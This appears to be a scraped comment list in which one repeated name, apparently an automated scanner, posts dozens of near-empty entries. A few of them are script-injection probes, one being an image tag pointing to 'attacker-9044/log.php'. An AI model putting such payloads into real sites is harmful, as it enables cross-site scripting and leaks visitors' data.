 • pHqghUme

  2021-05-06 08:54:13


  1


 • pHqghUme

  2021-05-06 08:54:13


  1


 • pHqghUme

  2021-05-06 08:54:12


  1


 • pHqghUme

  2021-05-06 08:54:12


  1


 • pHqghUme

  2021-05-06 08:54:11


  1


 • pHqghUme

  2021-05-06 08:54:11


  1


 • pHqghUme

  2021-05-06 08:54:10


  1


 • pHqghUme

  2021-05-06 08:54:09


  1


 • pHqghUme

  2021-05-06 08:54:08


  uWjWLZFe


 • pHqghUme

  2021-05-06 08:54:08


  1


 • qjtqN7SX

  2021-05-06 08:54:07


  1


 • pHqghUme

  2021-05-06 08:54:07


  1


 • pHqghUme

  2021-05-06 08:54:06


  1


 • pHqghUme

  2021-05-06 08:54:05


  1


 • pHqghUme

  2021-05-06 08:53:58


  1QMMMnMQO


 • 1CEZnTPiO

  2021-05-06 08:53:57


  1


 • pHqghUme

  2021-05-06 08:53:56


  1


 • pHqghUme

  2021-05-06 08:53:55


  1


 • pHqghUme

  2021-05-06 08:50:42


  1


 • pHqghUme

  2021-05-06 08:50:27


  1


 • pHqghUme

  2021-05-06 08:03:35


  1


 • pHqghUme

  2021-05-06 04:01:22


  1<Bqj3Gg<


 • pHqghUme

  2021-05-06 04:01:11


  1<img sRc='http://attacker-9044/log.php?


 • pHqghUme

  2021-05-06 04:00:58


  1<w4mSEn x=9292>